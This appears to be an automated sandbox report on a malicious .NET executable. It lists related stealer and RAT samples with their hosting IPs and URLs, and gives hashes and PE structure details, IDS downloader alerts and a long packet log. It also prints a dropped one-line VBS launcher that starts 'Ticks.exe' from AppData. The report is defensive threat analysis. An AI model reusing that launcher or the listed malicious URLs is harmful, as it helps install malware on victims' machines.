	arm4.elf	Get hash	malicious	Mirai	Browse	192.154.238.20
	Ref#60031796.exe	Get hash	malicious	AgentTesla	Browse	162.254.34.31
	Ref#1550238.exe	Get hash	malicious	AgentTesla	Browse	162.254.34.31
	DJ5PhUwOsM.exe	Get hash	malicious	AgentTesla, XWorm	Browse	162.254.34.31
ORACLE-BMC-31898US	MB263350411AE_1.scr.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	193.122.130.0
	ABG Draft.scr.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	158.101.44.242
	http://ubiquitous-twilight-c9292b.netlify.app/	Get hash	malicious	Unknown	Browse	129.213.176.209
	slime crypted.exe	Get hash	malicious	MassLogger RAT	Browse	193.122.130.0
	MB263350411AE.scr.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	193.122.130.0
	Remittance Advice.exe	Get hash	malicious	MassLogger RAT	Browse	193.122.130.0
	SOA.scr.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	158.101.44.242
	FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	trow.exe	Get hash	malicious	Unknown	Browse	147.154.3.56
	nfKqna8HuC.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	158.101.44.242
CLOUDFLARENETUS	sh4.elf	Get hash	malicious	Unknown	Browse	188.114.96.93
	http://ncn.acemlna.com	Get hash	malicious	Unknown	Browse	104.17.25.14
	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	104.21.48.1
	http://biomed.fi	Get hash	malicious	Unknown	Browse	104.17.25.14
	https://biomed.acemlna.com/lt.php?x=3TZy~GE4J6XM5p79_du5VOds1H_TjdEjvPthjaTKJ3DP65RA_ky.0.Rv2Y2liNA~j-xAXHXFJFQNDb.y_ELGV.Fw3Hyoi8	Get hash	malicious	Unknown	Browse	104.17.202.31
	MB263350411AE_1.scr.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.16.1
	VRO.exe	Get hash	malicious	Unknown	Browse	172.67.74.152
	mP8rzGD7fG.dll	Get hash	malicious	Unknown	Browse	104.26.13.205
	VRO.exe	Get hash	malicious	Unknown	Browse	104.26.12.205
	mP8rzGD7fG.dll	Get hash	malicious	Unknown	Browse	172.67.74.152

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	104.21.64.1
	MB263350411AE_1.scr.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.64.1
	ABG Draft.scr.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.64.1
	RENH3RE2025QUOTE.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.64.1
	PI ITS15235.doc	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	104.21.64.1
	tN8GsMV1le.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.64.1
	slime crypted.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.64.1
	rOrders.scr.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.64.1
	MB263350411AE.scr.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.64.1
	QUOTATION REQUIRED_Enatel s.r.l..bat.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	104.21.64.1
3b5074b1b5d032e5620f69f9f700ff0e	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	194.15.112.248
	VRO.exe	Get hash	malicious	Unknown	Browse	194.15.112.248
	mP8rzGD7fG.dll	Get hash	malicious	Unknown	Browse	194.15.112.248
	VRO.exe	Get hash	malicious	Unknown	Browse	194.15.112.248
	mP8rzGD7fG.dll	Get hash	malicious	Unknown	Browse	194.15.112.248
	iTVsz8WAu4.exe	Get hash	malicious	Unknown	Browse	194.15.112.248
	HLi4q5WAh3.exe	Get hash	malicious	Unknown	Browse	194.15.112.248
	e0691gXIKs.exe	Get hash	malicious	Unknown	Browse	194.15.112.248
	hJ1bl8p7dJ.exe	Get hash	malicious	Unknown	Browse	194.15.112.248
	Y4TyDwQzbE.exe	Get hash	malicious	Unknown	Browse	194.15.112.248

Process:	C:\Users\user\Desktop\50201668.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	84
Entropy (8bit):	4.832868393496726
Encrypted:	false
SSDEEP:	3:FER/n0eFHHo0nacwREaKC5UkHn:FER/lFHIcNwiaZ5UO
MD5:	A3209BB6DE47D1C591C013C0BA8AC54B
SHA1:	0D31A3308A3D872DC233D6E67B19783115723F03
SHA-256:	19246D4C8B06368998A4D2EC78463315066B42F06767BEF77E3B8049531E2FC0
SHA-512:	E5C0ACE12FF7B16E510FCC9CFAFDAC1CC097D7E90296575D502514849D1CFBD2DFF62CC3AEC22128A761E28F47AD3F5E1B092904426B44A255734EF5366E7E06
Malicious:	true
Reputation:	low
Preview:	CreateObject("WScript.Shell").Run """C:\Users\user\AppData\Roaming\Ticks.exe"""

C:\Users\user\AppData\Roaming\Ticks.exe

Download File

Process:	C:\Users\user\Desktop\50201668.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	92279
Entropy (8bit):	6.023059829759297
Encrypted:	false
SSDEEP:	1536:zmTuHUARnt03aPPh1WVsaT7FmbFgKzw11SX9AGBatPHRncDIDkiInv/mu:zbHUAhtVXjWVsaT7FmbFY14BatPH5/kz
MD5:	651C185ECCB37D286F19767A716BB68E
SHA1:	F2A06F853E287C09D4941B0E4A3C57518E54C7C7
SHA-256:	9A5B6656C68D4210BF134FD61D70D402D89E419EF6D09E871728BF9B3D6DC4A0
SHA-512:	B39AAB4EFE999F0F38AB2A84FFF9A351C5A0F279C3D61AE3FD684F669C199DA8279FC9621E1C0F1136B2A43AEBC4FA9A1F4E7EEF82DC28671A3620CFC50BB757
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g.....................J......>.... ........@.. ....................................`.....................................W.... ...H...........:..x............................................................ ............... ..H............text...D.... ...................... ..`.rsrc....H... ...H..................@..@.reloc...............8..............@..B................ .......H...........<c..........@...h............................................0..........(......(......0............(....u.....s...... ....(....(....o..... ....(....(....o.....o.....(.........io....o........,..o.....(....o.....14.....(..... ....(....o.... ....(....(....(...+o....&........I\........(.....0..S.........+J.s....%o.... ....(.... F...(....o....% ....(....s....o....o.....o......&...,...........FK......:..o.....(....J.o-....o....s....V.(......}......}....*2.{....o

C:\Users\user\AppData\Roaming\Ticks.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\50201668.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Reputation:	high, very likely benign file
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	6.023059829759297
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 50.01% Win32 Executable (generic) a (10002005/4) 49.97% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	50201668.exe
File size:	92'279 bytes
MD5:	651c185eccb37d286f19767a716bb68e
SHA1:	f2a06f853e287c09d4941b0e4a3c57518e54c7c7
SHA256:	9a5b6656c68d4210bf134fd61d70d402d89e419ef6d09e871728bf9b3d6dc4a0
SHA512:	b39aab4efe999f0f38ab2a84fff9a351c5a0f279c3d61ae3fd684f669c199da8279fc9621e1c0f1136b2a43aebc4fa9a1f4e7eef82dc28671a3620cfc50bb757
SSDEEP:	1536:zmTuHUARnt03aPPh1WVsaT7FmbFgKzw11SX9AGBatPHRncDIDkiInv/mu:zbHUAhtVXjWVsaT7FmbFY14BatPH5/kz
TLSH:	C8933907236C47D3C399197D4CFA12704777DDA2EE46C2C71AC8BF9878727922B5829A
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g.....................J......>.... ........@.. ....................................`................................

File Icon


Icon Hash:	27d8d8d4d4d85006

Static PE Info

General

Entrypoint:	0x410d3e
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x6785A49B [Mon Jan 13 23:41:15 2025 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Authenticode Signature

Signature Valid:
Signature Issuer:
Signature Validation Error:
Error Number:
Not Before, Not After
Subject Chain
Version:
Thumbprint MD5:
Thumbprint SHA-1:
Thumbprint SHA-256:
Serial:

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x10ce4	0x57	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x12000	0x4800	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x13a00	0x2e78
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x18000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xed44	0xee00	649307742fef8e479572a3de94efe843	False	0.5405068277310925	data	6.174939960479522	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x12000	0x4800	0x4800	2539155666bca9d08b1e6581121b205b	False	0.06287977430555555	data	2.216524638775336	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x18000	0xc	0x200	96dad9be99168009f84a8a3093acda00	False	0.044921875	data	0.08153941234324169	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0x12130	0x4028	Device independent bitmap graphic, 64 x 128 x 32, image size 0	0.02289332683877253
RT_GROUP_ICON	0x16158	0x14	data	1.05
RT_VERSION	0x1616c	0x390	data	0.4309210526315789
RT_MANIFEST	0x164fc	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators	0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-14T14:23:09.900906+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.7	49736	193.122.130.0	80	TCP
2025-01-14T14:23:16.557167+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.7	49736	193.122.130.0	80	TCP
2025-01-14T14:23:37.322867+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.7	49888	193.122.130.0	80	TCP
2025-01-14T14:23:44.197923+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.7	49888	193.122.130.0	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 14, 2025 14:22:55.698591948 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:22:55.698642015 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:22:55.698797941 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:22:55.711945057 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:22:55.711982012 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:22:56.860207081 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:22:56.860313892 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:22:56.870882034 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:22:56.870903969 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:22:56.871191978 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:22:56.916675091 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:22:57.055071115 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:22:57.099354982 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:22:57.842011929 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:22:57.842040062 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:22:57.842159986 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:22:57.842161894 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:22:57.842180014 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:22:57.842209101 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:22:57.842214108 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:22:57.842255116 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:22:57.842262030 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:22:57.885251999 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:22:58.022900105 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:22:58.022914886 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:22:58.022986889 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:22:58.023108006 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:22:58.023161888 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:22:58.023706913 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:22:58.023755074 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:22:58.024146080 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:22:58.024194002 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:22:58.025080919 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:22:58.025116920 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:22:58.025140047 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:22:58.025172949 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:22:58.025192022 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:22:58.025207043 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:22:58.043983936 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:22:58.044090033 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:22:58.214926004 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:22:58.215001106 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:22:58.215023041 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:22:58.215079069 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:22:58.423873901 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:22:58.423947096 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:22:58.424153090 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:22:58.424204111 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:22:58.588629007 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:22:58.588711977 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:22:58.605243921 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:22:58.605319023 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:22:58.606575966 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:22:58.606635094 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:22:58.606878042 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:22:58.606929064 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:22:58.607430935 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:22:58.607486963 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:22:58.777152061 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:22:58.777211905 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:22:58.777231932 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:22:58.777251005 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:22:58.777275085 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:22:58.777292013 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:22:58.791959047 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:22:58.792136908 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:22:58.792242050 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:22:58.792296886 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:22:58.792494059 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:22:58.792527914 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:22:58.792546988 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:22:58.792558908 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:22:58.792582989 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:22:58.792592049 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:22:58.793282986 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:22:58.793323040 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:22:58.793349981 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:22:58.793355942 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:22:58.793375015 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:22:58.794708967 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:22:58.794764996 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:22:58.794766903 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:22:58.794794083 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:22:58.794816017 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:22:58.794832945 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:22:58.795243025 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:22:58.795294046 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:22:58.962522984 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:22:58.962574959 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:22:58.962583065 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:22:58.962598085 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:22:58.962625980 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:22:58.962843895 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:22:58.962894917 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:22:58.962918043 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:22:58.962925911 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:22:58.962954998 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:22:58.977268934 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:22:58.977329016 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:22:58.977348089 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:22:58.977448940 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:22:58.977540970 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:22:58.977585077 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:22:58.977658033 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:22:58.977700949 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:22:58.978696108 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:22:58.978748083 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:22:58.978981972 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:22:58.979032040 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:22:58.979044914 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:22:58.979360104 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:22:58.979397058 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:22:58.979407072 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:22:58.979417086 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:22:58.979437113 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:22:59.025870085 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:22:59.145348072 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:22:59.145391941 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:22:59.145420074 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:22:59.145431042 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:22:59.145482063 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:22:59.145565987 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:22:59.145611048 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:22:59.400403023 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:22:59.400444031 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:22:59.400470018 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:22:59.400484085 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:22:59.400504112 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:22:59.400521040 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:22:59.400614977 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:22:59.400670052 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:22:59.400908947 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:22:59.400954962 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:22:59.401123047 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:22:59.401166916 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:22:59.401470900 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:22:59.401525974 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:22:59.401647091 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:22:59.401693106 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:22:59.401736021 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:22:59.401742935 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:22:59.401786089 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:22:59.572206974 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:22:59.572284937 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:22:59.572508097 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:22:59.572560072 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:22:59.572599888 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:22:59.572649956 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:22:59.572906971 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:22:59.572947025 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:22:59.572992086 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:22:59.573003054 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:22:59.573028088 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:22:59.573079109 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:22:59.573481083 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:22:59.573533058 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:22:59.573534012 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:22:59.573544025 CET	443	49699	194.15.112.248	192.168.2.7
